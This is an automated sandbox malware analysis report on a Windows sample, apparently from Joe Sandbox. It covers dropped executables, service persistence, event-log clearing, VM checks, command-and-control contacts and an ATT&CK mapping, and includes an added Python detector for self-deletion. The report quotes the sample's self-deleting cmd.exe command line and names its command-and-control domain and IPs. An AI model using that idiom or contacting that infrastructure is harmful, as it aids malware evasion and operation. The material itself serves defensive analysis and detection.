            Source: SySyeu.exe.3.dr | Static PE information: section name: .didat
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Code function: 1_2_003C1638 push dword ptr [003C3084h]; ret | 1_2_003C170E
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Code function: 1_2_003C2D9B push ecx; ret | 1_2_003C2DAB
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Code function: 1_2_003C6014 push 003C14E1h; ret | 1_2_003C6425
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | Code function: 1_2_003C600A push ebp; ret | 1_2_003C600D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_10004C68 push eax; ret | 3_2_10004C86
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_10004CA0 push eax; ret | 3_2_10004CCE
            Source: C:\Windows\SysWOW64\SySyeu.exe | Code function: 7_2_00E16883 push ecx; ret | 7_2_00E16896
            Source: C:\Windows\SysWOW64\SySyeu.exe | Code function: 7_2_00E1682D push ecx; ret | 7_2_00E16840
            Source: XekSuT.exe.0.dr | Static PE information: section name: .text entropy: 7.81169422100848
            Source: MyProg.exe.1.dr | Static PE information: section name: Y|uR entropy: 6.934324181874163
            Source: SciTE.exe.1.dr | Static PE information: section name: u entropy: 6.933697981349293
            Source: Uninstall.exe.1.dr | Static PE information: section name: EpNuZ entropy: 6.933797111028876

            Persistence and Installation Behavior

            Source: C:\Windows\SysWOW64\svchost.exe | Executable created and started: C:\Windows\SysWOW64\SySyeu.exe
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | System file written: C:\Program Files\7-Zip\Uninstall.exe
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
            Source: C:\Windows\SysWOW64\svchost.exe | File created (dropped file): C:\Windows\SysWOW64\SySyeu.exe
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | File created (dropped file): C:\Users\user\AppData\Local\Temp\6011859.dll
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | File created (dropped file): C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | File created (dropped file): C:\Users\user\AppData\Local\Temp\XekSuT.exe
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | File created (dropped file): C:\Program Files\7-Zip\Uninstall.exe
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe | File created (dropped file): C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
            Source: C:\Windows\SysWOW64\svchost.exe | File created (dropped file): C:\Windows\SysWOW64\SySyeu.exe
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exe | Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SySyeu
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_10001A43 OpenSCManagerA,OpenServiceA,StartServiceA,GetLastError,CloseServiceHandle,QueryServiceStatus,Sleep,CloseServiceHandle,CloseServiceHandle | 3_2_10001A43

            Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\gE4NVCZDRk.exe - Process created: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 1 && del /f/q "C:\Users\user\Desktop\gE4NVCZDRk.exe"
Source: unknown - Network traffic detected: HTTP traffic on port 49730 -> 799
Source: unknown - Network traffic detected: HTTP traffic on port 49731 -> 799
Source: unknown - Network traffic detected: HTTP traffic on port 49732 -> 799
Source: unknown - Network traffic detected: HTTP traffic on port 49733 -> 799
Source: unknown - Network traffic detected: HTTP traffic on port 49734 -> 799
Source: C:\Users\user\Desktop\gE4NVCZDRk.exe - Code function: 0_2_00402400 IsIconic,0_2_00402400
Source: C:\Windows\SysWOW64\svchost.exe - Code function: 3_2_1000265E OpenEventLogA,ClearEventLogA,CloseEventLog,3_2_1000265E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_10003E6B LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,3_2_10003E6B
Source: C:\Windows\System32\wbem\WMIADAP.exe - Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance Performance Data
Source: C:\Users\user\Desktop\gE4NVCZDRk.exe - Process information set: NOOPENFILEERRORBOX (16 occurrences)
Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe - Process information set: NOOPENFILEERRORBOX (5 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe - Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\SySyeu.exe - Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe - Process information set: NOOPENFILEERRORBOX (16 occurrences)
Source: C:\Windows\SysWOW64\WerFault.exe - Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (10 occurrences)
Source: C:\Windows\SysWOW64\WerFault.exe - Process information set: NOOPENFILEERRORBOX (54 occurrences)
Source: C:\Windows\System32\wbem\WMIADAP.exe - Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Windows\System32\wbem\WMIADAP.exe - Process information set: NOOPENFILEERRORBOX
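The command line recorded in this section, cmd.exe /c ping 127.0.0.1 -n 1 && del /f/q "<sample path>", is the standard self-deletion idiom: a ping against loopback is a one-second sleep that lets the parent process exit and release its file lock before del runs. A detection that fires on ping alone drowns in admin noise; keying on the deleted path matching the parent's own image is what separates the two. The code below is an added example, not part of the Joe Sandbox report. The process events are constructed to mirror the process chain above, modelled loosely on Sysmon Event ID 1 fields; PID 7112 is the sample's PID from the report, every other PID and the two benign look-alike events are invented.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcessEvent:
    """One process-creation record (Sysmon Event ID 1 or an EDR equivalent)."""
    pid: int
    ppid: int
    image: str
    command_line: str


# Pinging a loopback address never tests connectivity, so "ping <loopback> -n N" is a ~N second sleep.
LOOPBACK = r"(?:127\.0\.0\.1|localhost|::1)"
PING_LOOPBACK_RE = re.compile(r"\bping\b[^&|]*?(?<!\S)" + LOOPBACK + r"(?!\S)", re.IGNORECASE)
# "... && del [/switches] "<path>"" closing the command line; group(1) is the deletion target.
DEL_TARGET_RE = re.compile(r"&&\s*del\b(?:\s+/\S+)*\s+\"?([^\"]+?)\"?\s*$", re.IGNORECASE)


def detect(events: List[ProcessEvent]) -> List[Tuple[str, int, str]]:
    """Return (rule, pid, detail) triples for ping-as-sleep and self-deletion via cmd.exe."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        cmdline = e.command_line
        if PING_LOOPBACK_RE.search(cmdline):
            hits.append(("ping_loopback_delay", e.pid, cmdline))
        if not e.image.lower().endswith("\\cmd.exe"):
            continue
        m = DEL_TARGET_RE.search(cmdline)
        if not m:
            continue
        target = m.group(1).strip()
        parent = by_pid.get(e.ppid)
        # The discriminating signal: the file being deleted is the parent's own executable.
        if parent is not None and target.lower() == parent.image.lower():
            hits.append(("self_delete_via_cmd", e.pid,
                         "%s deleted by its child cmd.exe (pid %d)" % (parent.image, e.pid)))
    return hits


# Constructed events: the report's chain (sample -> cmd.exe -> PING.EXE) plus two benign look-alikes.
SAMPLE_EVENTS = [
    ProcessEvent(4000, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcessEvent(7112, 4000, r"C:\Users\user\Desktop\gE4NVCZDRk.exe",
                 r'"C:\Users\user\Desktop\gE4NVCZDRk.exe"'),
    ProcessEvent(7200, 7112, r"C:\Windows\SysWOW64\cmd.exe",
                 r'"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 1 && del /f/q "C:\Users\user\Desktop\gE4NVCZDRk.exe"'),
    ProcessEvent(7210, 7200, r"C:\Windows\SysWOW64\PING.EXE", "ping 127.0.0.1 -n 1"),
    # An admin checking a real host: ping, but not loopback.
    ProcessEvent(8000, 4000, r"C:\Windows\System32\cmd.exe",
                 r'"C:\Windows\System32\cmd.exe" /c ping fileserver -n 4'),
    # An installer clean-up: "&& del", but the target is not the parent's image.
    ProcessEvent(8100, 4000, r"C:\Windows\System32\cmd.exe",
                 r'"C:\Windows\System32\cmd.exe" /c timeout /t 5 && del /q "C:\Users\user\AppData\Local\Temp\setup.log"'),
]


if __name__ == "__main__":
    for rule, pid, detail in detect(SAMPLE_EVENTS):
        print("%-22s pid=%d  %s" % (rule, pid, detail))
```

The parent lookup is by PID within the same event batch, so the window of events handed to `detect()` has to include the parent's creation record; on a SIEM that usually means joining on ParentProcessGuid rather than ParentProcessId, since PIDs are reused.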

            Malware Analysis System Evasion

Source: C:\Users\user\Desktop\gE4NVCZDRk.exe - Evasive API call chain: CreateMutex,DecisionNodes,Sleep graph_0-436
Source: C:\Windows\SysWOW64\cmd.exe - Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 1
Source: C:\Windows\SysWOW64\svchost.exe - Window / User API: threadDelayed 9730
Source: C:\Windows\SysWOW64\SySyeu.exe - Window / User API: threadDelayed 1467
Source: C:\Windows\System32\wbem\WMIADAP.exe - Window / User API: threadDelayed 2099
Source: C:\Windows\System32\wbem\WMIADAP.exe - Window / User API: threadDelayed 899
Source: C:\Windows\System32\wbem\WMIADAP.exe - Window / User API: threadDelayed 1299
Source: C:\Windows\System32\wbem\WMIADAP.exe - Window / User API: threadDelayed 771
Source: C:\Windows\System32\wbem\WMIADAP.exe - Window / User API: threadDelayed 1076
Source: C:\Windows\SysWOW64\svchost.exe - Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_3-1591
Source: C:\Users\user\Desktop\gE4NVCZDRk.exe - Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\6011859.dll
Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe - Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe - Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe - Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe - Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_1-1053
Source: C:\Windows\SysWOW64\svchost.exe TID: 3264 - Thread sleep count: 267 > 30
Source: C:\Windows\SysWOW64\svchost.exe TID: 3264 - Thread sleep time: -267000s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exe TID: 3264 - Thread sleep count: 9730 > 30
Source: C:\Windows\SysWOW64\svchost.exe TID: 3264 - Thread sleep time: -9730000s >= -30000s
Source: C:\Windows\SysWOW64\SySyeu.exe TID: 3624 - Thread sleep count: 1467 > 30
Source: C:\Windows\SysWOW64\SySyeu.exe TID: 3624 - Thread sleep time: -733500s >= -30000s
Source: C:\Windows\SysWOW64\SySyeu.exe TID: 3624 - Thread sleep count: 108 > 30
Source: C:\Windows\SysWOW64\SySyeu.exe TID: 3624 - Thread sleep time: -54000s >= -30000s
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6420 - Thread sleep count: 2099 > 30
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6420 - Thread sleep count: 899 > 30
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6420 - Thread sleep count: 1299 > 30
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6420 - Thread sleep count: 771 > 30
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6420 - Thread sleep count: 1076 > 30
Source: C:\Windows\SysWOW64\svchost.exe - Last function: Thread delayed (2 occurrences)
Source: C:\Windows\System32\conhost.exe - Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe - Code function: 1_2_003C1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 003C1754h 1_2_003C1718
Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe - Code function: 1_2_003C29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_003C29E2
Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe - Code function: 1_2_003C2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,1_2_003C2B8C
Source: C:\Windows\SysWOW64\svchost.exe - Code function: 3_2_1000358C GetSystemInfo,wsprintfA,3_2_1000358C
Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe - File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe - File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe - File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe - File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe - File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe - File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
Source: Amcache.hve.1.dr - Binary or memory string: VMware
Source: Amcache.hve.1.dr - Binary or memory string: VMware Virtual USB Mouse
Source: gE4NVCZDRk.exe, 00000000.00000002.1706261210.000000000067D000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Y
Source: Amcache.hve.1.dr - Binary or memory string: vmci.syshbin
Source: Amcache.hve.1.dr - Binary or memory string: VMware, Inc.
Source: Amcache.hve.1.dr - Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.1.dr - Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.1.dr - Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.1.dr - Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: XekSuT.exe, 00000001.00000002.1891528876.0000000001581000.00000004.00000020.00020000.00000000.sdmp, XekSuT.exe, 00000001.00000002.1891528876.00000000015CC000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW
Source: Amcache.hve.1.dr - Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.1.dr - Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.1.dr - Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.1.dr - Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: SySyeu.exe, 00000007.00000002.4131120293.0000000003147000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.1.dr - Binary or memory string: vmci.sys
Source: Amcache.hve.1.dr - Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: gE4NVCZDRk.exe, 00000000.00000002.1706261210.000000000067D000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.1.dr - Binary or memory string: vmci.syshbin`
Source: Amcache.hve.1.dr - Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.1.dr - Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.1.dr - Binary or memory string: VMware20,1
Source: Amcache.hve.1.dr - Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.1.dr - Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.1.dr - Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.1.dr - Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.1.dr - Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.1.dr - Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.1.dr - Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.1.dr - Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.1.dr - Binary or memory string: VMware Virtual RAM
Source: XekSuT.exe, 00000001.00000002.1891528876.000000000155C000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAWL
Source: Amcache.hve.1.dr - Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.1.dr - Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe - API call chain: ExitProcess graph end node graph_1-1028
Source: C:\Windows\SysWOW64\SySyeu.exe - API call chain: ExitProcess graph end node graph_7-2030
Source: C:\Users\user\Desktop\gE4NVCZDRk.exe - Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\SySyeu.exe - Code function: 7_2_00E15E4F LdrResolveDelayLoadedAPI,7_2_00E15E4F
Source: C:\Windows\SysWOW64\SySyeu.exe - Code function: 7_2_00E125B2 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,7_2_00E125B2
Source: C:\Users\user\Desktop\gE4NVCZDRk.exe - Code function: 0_2_00401B6B LoadLibraryA,GetProcAddress,__p__pgmptr,sprintf,GetCurrentProcess,SetPriorityClass,GetCurrentThread,SetThreadPriority,ShellExecuteA,0_2_00401B6B
Source: C:\Users\user\Desktop\gE4NVCZDRk.exe - Code function: 0_2_0040C044 mov eax, dword ptr fs:[00000030h] 0_2_0040C044
Source: C:\Windows\SysWOW64\SySyeu.exe - Code function: 7_2_00E13F6B mov esi, dword ptr fs:[00000030h] 7_2_00E13F6B
Source: C:\Windows\SysWOW64\svchost.exe - Code function: 3_2_10003D5D FreeLibrary,free,VirtualFree,GetProcessHeap,HeapFree,3_2_10003D5D
Source: C:\Windows\SysWOW64\SySyeu.exe - Code function: 7_2_00E161C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00E161C0
Source: C:\Windows\SysWOW64\SySyeu.exe - Code function: 7_2_00E16510 SetUnhandledExceptionFilter,7_2_00E16510
Source: C:\Users\user\Desktop\gE4NVCZDRk.exe - Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 1 && del /f/q "C:\Users\user\Desktop\gE4NVCZDRk.exe"
Source: C:\Windows\SysWOW64\cmd.exe - Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 1
Source: C:\Windows\System32\svchost.exe - Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6180 -ip 6180
Source: C:\Windows\System32\svchost.exe - Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6180 -s 1456
            Source: SciTE.exe.1.drBinary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe - Code function: 1_2_003C1718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv,1_2_003C1718
Source: C:\Users\user\AppData\Local\Temp\XekSuT.exe - Code function: 1_2_003C139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,1_2_003C139F
Source: Amcache.hve.1.dr - Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.1.dr - Binary or memory string: msmpeng.exe
Source: Amcache.hve.1.dr - Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: gE4NVCZDRk.exe - Binary or memory string: 360tray.exe
Source: Amcache.hve.1.dr - Binary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

Source: Yara match - File source: Process Memory Space: XekSuT.exe PID: 6180, type: MEMORYSTR
Source: Yara match - File source: gE4NVCZDRk.exe, type: SAMPLE
Source: Yara match - File source: 0.0.gE4NVCZDRk.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match - File source: 00000000.00000000.1680620714.0000000000403000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match - File source: Process Memory Space: gE4NVCZDRk.exe PID: 7112, type: MEMORYSTR

            Remote Access Functionality

Source: Yara match - File source: Process Memory Space: XekSuT.exe PID: 6180, type: MEMORYSTR
Source: Yara match - File source: gE4NVCZDRk.exe, type: SAMPLE
Source: Yara match - File source: 0.0.gE4NVCZDRk.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match - File source: 00000000.00000000.1680620714.0000000000403000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match - File source: Process Memory Space: gE4NVCZDRk.exe PID: 7112, type: MEMORYSTR
            MITRE ATT&CK Matrix (one line per tactic, techniques in matrix order; the number in parentheses is the signature count the report shows for that technique, techniques without a number carry no count in the report)

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances; Gather Victim Org Information
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains; DNS Server
            Initial Access: Valid Accounts (1); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain
            Execution: Native API (12); Command and Scripting Interpreter (2); Service Execution (12); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell
            Persistence: DLL Side-Loading (1); Valid Accounts (1); Windows Service (22); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
            Privilege Escalation: DLL Side-Loading (1); Valid Accounts (1); Access Token Manipulation (11); Windows Service (22); Process Injection (13); RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
            Defense Evasion: Obfuscated Files or Information (2); Software Packing (12); Timestomp (1); DLL Side-Loading (1); File Deletion (11); Masquerading (121); Valid Accounts (1); Modify Registry (1); Virtualization/Sandbox Evasion (1); Access Token Manipulation (11); Process Injection (13); Indicator Removal (1)
            Credential Access: Input Capture (11); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging
            Discovery: System Time Discovery (11); File and Directory Discovery (5); System Information Discovery (4); Security Software Discovery (131); Virtualization/Sandbox Evasion (1); Process Discovery (13); Application Window Discovery (11); Remote System Discovery (1); System Network Configuration Discovery (1); Network Service Discovery; System Network Connections Discovery; Process Discovery
            Lateral Movement: Taint Shared Content (1); Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools; Taint Shared Content
            Collection: Archive Collected Data (1); Input Capture (11); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture
            Command and Control: Ingress Tool Transfer (2); Encrypted Channel (1); Non-Standard Port (11); Non-Application Layer Protocol (2); Application Layer Protocol (12); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol; Exfiltration Over Physical Medium
            Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption; Resource Hijacking

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            Behavior Graph (ID: 1544387, Sample: gE4NVCZDRk.exe, Start date: 29/10/2024, Architecture: WINDOWS, Score: 100)

            Signatures on the sample node: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 11 other signatures. Contacted domain: ddos.dnsnb8.net.

            Process tree (numbers after a process name are the node counts from the graph, see the legend above; dropped files, signatures and network contacts are listed under the process they belong to):

            gE4NVCZDRk.exe 5 3 (started)
              dropped: C:\Users\user\AppData\Local\Temp\XekSuT.exe (PE32); C:\Users\user\AppData\Local\...\6011859.dll (PE32)
              signatures: Found evasive API chain (may stop execution after checking mutex); Self deletion via cmd or bat file
              XekSuT.exe 22 (started)
                network: ddos.dnsnb8.net 44.221.84.105, ports 49730, 49731, 49732, AMAZON-AESUS, United States
                dropped: C:\Program Files\7-Zip\Uninstall.exe (PE32); C:\Program Files (x86)\AutoIt3\...\SciTE.exe (PE32); C:\Program Files (x86)\AutoIt3\...\MyProg.exe (MS-DOS)
                signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); 2 other signatures
                WerFault.exe 21 16 (started)
              cmd.exe 1 (started)
                signatures: Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks
                PING.EXE 1 (started)
                  network: 127.0.0.1, unknown, unknown
                conhost.exe (started)
            svchost.exe 1 (started)
              dropped: C:\Windows\SysWOW64\SySyeu.exe (PE32)
              signatures: Drops executables to the windows directory (C:\Windows) and starts them
              SySyeu.exe 1 (started)
                network: 119.91.152.151, ports 49735, 49743, 8321, CNNIC-QCN-APQingdaoCableTVNetworkCenterCN, China
            svchost.exe (started)
              signatures: Checks if browser processes are running
            svchost.exe 3 8 (started)
              WerFault.exe 2 (started)
                WMIADAP.exe 20 10 (started)

            Antivirus detection for the submitted sample
            Source | Detection | Scanner | Label
